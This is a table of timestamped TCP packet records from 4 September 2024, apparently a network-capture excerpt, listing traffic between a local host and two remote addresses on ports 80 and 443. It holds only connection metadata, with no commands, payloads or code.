Sep 4, 2024 17:37:10.727519035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727524042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727530003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727535009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727539062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727549076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727564096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727571964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727582932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727585077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727593899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727602959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727613926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727632999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727933884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727967024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728028059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728039026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728048086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728059053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728070021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728074074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728085041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728092909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728094101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728106022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728106976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728117943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728127003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728127003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728149891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728157997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728502989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728512049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728521109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728532076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728537083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728543997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728544950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728554964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728562117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728565931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728576899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.728581905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728602886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728621006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.728631020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.730092049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770642996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770653963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770663023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770731926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770739079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770764112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770773888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770781994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770782948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770791054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770797014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770807028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770826101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770832062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770914078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770925045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770934105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770945072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.770951986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.770972967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771084070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771094084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771100998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771107912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771115065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771119118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771131992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771136999 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771159887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771179914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771295071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771306992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771318913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771327019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771327019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771336079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771353006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771362066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771440029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771450043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771457911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771467924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771472931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771486044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771492958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771497011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771506071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771512985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771516085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771526098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771533966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771537066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771548986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771557093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771559000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771565914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771568060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771578074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771585941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771593094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771593094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771603107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771611929 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771617889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771627903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771636009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771639109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771646023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771656036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771658897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771665096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771676064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771678925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771684885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771694899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771696091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771704912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771716118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771725893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771728992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771764994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771765947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771790981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771802902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771812916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771821976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771826982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771831036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771837950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771843910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771855116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.771855116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771871090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.771894932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.772349119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.772384882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.773598909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.773611069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.773619890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.773648977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.773669958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.773757935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.773921013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.773960114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774064064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774080038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774116993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774204016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774214983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774224997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774235010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774246931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774260044 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774283886 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774346113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774357080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774367094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774377108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774389982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774391890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774400949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774415016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774425030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774451971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774481058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774502039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774517059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774518967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774530888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774543047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774557114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774568081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.774656057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.774693012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.778656960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778667927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778676987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778687000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778709888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.778743029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.778788090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778799057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778808117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778817892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778831005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.778842926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.778866053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.778928041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.778960943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779115915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779130936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779140949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779150963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779151917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779161930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779162884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779175043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779185057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779211998 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779258013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779268980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779293060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779310942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779450893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779460907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779470921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779480934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779488087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779491901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779498100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779516935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779535055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779731035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779742002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779752016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.779774904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.779797077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.780019045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780030012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780040026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780050993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780061960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.780090094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.780447960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780458927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780472994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780493021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780502081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.780502081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.780505896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780524015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.780539036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.780590057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780601978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.780637026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.781019926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.781147003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.781162977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.781188965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.781199932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.781295061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.781310081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.781321049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.781332016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.781332016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.781342983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.781377077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.791181087 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.791197062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.791251898 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.791270018 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.791851044 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.791886091 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.791898966 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.791906118 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.791918993 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.791944027 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.792340994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.792354107 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.792378902 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.792385101 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.792396069 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.792669058 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.792686939 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.792709112 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.792716026 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.792726994 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.792747974 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.793034077 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.793045998 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.793088913 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.793097019 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.794085979 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.795036077 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.795063972 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.795084953 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.795092106 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.795119047 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.795129061 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.796842098 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.796863079 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.796886921 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.796895981 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.796910048 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.796931982 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.797359943 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.797375917 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.797414064 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.797420979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.797435045 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.797458887 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.812505007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812514067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812521935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812531948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812541962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812551975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812558889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812561989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812572956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812582016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812587976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812592030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812607050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812613964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812632084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812640905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812644005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812654018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812663078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812673092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812679052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812683105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812693119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812699080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812702894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812711954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812712908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812722921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812732935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812737942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812741995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812752962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812761068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812771082 CEST	49719	80	192.168.2.6	147.45.44.104
